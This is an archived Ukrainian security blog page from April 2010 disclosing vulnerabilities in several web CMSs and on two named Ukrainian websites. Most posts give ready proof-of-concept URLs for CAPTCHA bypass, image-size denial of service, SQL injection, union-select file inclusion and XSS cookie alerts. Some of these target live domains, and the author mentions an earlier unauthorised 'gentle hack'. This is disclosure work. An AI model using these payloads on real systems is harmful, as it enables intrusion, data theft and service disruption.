Архів для категорії 'Уразливості'

Уразливості в com_bookman для Joomla

23:59 10.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в компоненті com_bookman для Joomla. Також даний компонент входить до складу Reservation Manager for Joomla. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Раніше я вже згадував про CB Captcha для Joomla і Mambo, що також використовує даний скрипт капчі.

Insufficient Anti-automation:

http://site/components/com_bookman/functions/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/components/com_bookman/functions/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії com_bookman та всі версії Reservation Manager for Joomla.

Добірка уразливостей

15:29 10.04.2010

В даній добірці уразливості в веб додатках:

Уразливості в ClickCMS

23:55 09.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі ClickCMS (Click Content Management System) що входить до ClickEMU. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC. Останній варіант атаки можливий через некоректну реалізацію захисту в системі від даного методу обходу.

DoS:

http://site/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі всі версії ClickCMS.

Уразливості на www.paritet.ua

19:04 09.04.2010

07.10.2009

У лютому, 08.02.2009, я знайшов SQL Injection, Full path disclosure, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.paritet.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.04.2010

SQL Injection:

http://www.paritet.ua/?mid=9%20and%20version()=5

Full path disclosure:

http://www.paritet.ua/?mid=-1

SQL DB Structure Extraction:

http://www.paritet.ua/?mid=-1′

XSS:

http://www.paritet.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені. Окрім SQL Injection уразливості, що дуже несерйозно.

Уразливості в Sebo - webstore

23:56 08.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в Sebo - webstore (e-commerce система). Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/libs/captcha/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі як через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше, так і з використанням метода session reusing with constant captcha bypass method, описаного в проекті MoBiC.

DoS:

http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі Sebo - webstore 0.14 та попередні версії.

Нові уразливості в CMS SiteLogic

19:01 07.04.2010

09.02.2010

У червні, 28.06.2009, я знайшов SQL Injection, Local File Inclusion, Directory Traversal та Full path disclosure уразливості в CMS SiteLogic. Це українська комерційна CMS. Уразливості виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS SiteLogic.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

07.04.2010

SQL Injection:

http://site/?fun=-1%20or%20version()%3E4

Local File Inclusion (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,105,110,100,101,120,46,112,104,112),1

Включення index.php.

Directory Traversal (через SQL Injection):

http://site/?fun=-1%20union%20select%201,0,char(46,46,47,46,104,116,97,99,99,101,115,115),1

Включення .htaccess.

Full path disclosure:

http://site/?fun=-1

Добірка уразливостей

16:29 06.04.2010

В даній добірці уразливості в веб додатках:

  • Netgear SSL312 Router - remote DoS (деталі)
  • Netgear SSL312 Router - remote DoS (деталі)
  • Theeta CMS (Cross Site Scripting, SQL Injection) Multiple Vulnerabilities (деталі)
  • Eshopbuilde CMS SQL Injection Vulnerability (деталі)
  • Xxasp v3.3.2 Sql injection (деталі)
  • Cacti 0.8.7e: Multiple security issues (деталі)
  • 40 vulnerabilities in SMF 1.1.10/SMF 2.0RC2 by elhacker.net (деталі)
  • TFTPUtil GUI TFTP Server Denial of Service Vulnerability (деталі)
  • TFTPUtil GUI TFTP Server Denial of Service Vulnerability (деталі)
  • PHPIDS Unserialize() Vulnerability (деталі)

Уразливості в CCMS

23:52 03.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі CCMS - Clan Content Management System. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/CaptchaSecurityImages.php?width=150&height=100&characters=2

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше.

DoS:

http://site/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразлива версія CCMS 1.0.

Уразливості на www.usdp.kiev.ua

19:15 03.04.2010

06.10.2009

У лютому, 07.02.2009, я знайшов SQL Injection, Full path disclosure та Cross-Site Scripting уразливості на http://www.usdp.kiev.ua - сайті політичної партії УСДП. Про що найближчим часом сповіщу адміністрацію сайта.

Зазначу, що я вже повідомляв власникам сайта про проблеми з його безпекою (шляхом ніжного хака сайта). Але вони й досі не виправили жодної уразливості на сайті, тим самим продовживши ігнорувати проблему безпеки власного ресурсу.

Детальна інформація про уразливості з’явиться пізніше.

03.04.2010

SQL Injection:

http://www.usdp.kiev.ua/?mid=-1%20or%20version()=5

http://www.usdp.kiev.ua/?mid=157&action=events_detail&id=-1%20or%20version()=5

Full path disclosure:

http://www.usdp.kiev.ua/?mid=-1

XSS:

http://www.usdp.kiev.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Дані уразливості вже виправлені. Але всіх проблем з безпекою сайта це не вирішило, бо на сайті все ще є дірки.

Уразливості в NovaBoard

23:55 02.04.2010

У березні, 17.03.2010, я знайшов Insufficient Anti-automation та Denial of Service уразливості в системі NovaBoard. Про що найближчим часом сповіщу розробників.

Уразливості наявні в скрипті капчі CaptchaSecurityImages.php, що використовується в даній системі. Про уразливості в CaptchaSecurityImages я вже розповідав.

Insufficient Anti-automation:

http://site/scripts/php/captcha/CaptchaSecurityImages.php?width=150&height=100

Можливий обхід капчі через напівавтоматизований або автоматизований (з використанням OCR) методи, що були згадані раніше. Значення characters фіксоване.

DoS:

http://site/scripts/php/captcha/CaptchaSecurityImages.php?width=1000&height=9000

Вказавши великі значення width і height можна створити велике навантаження на сервер.

Уразливі NovaBoard 1.1.2 та попередні версії.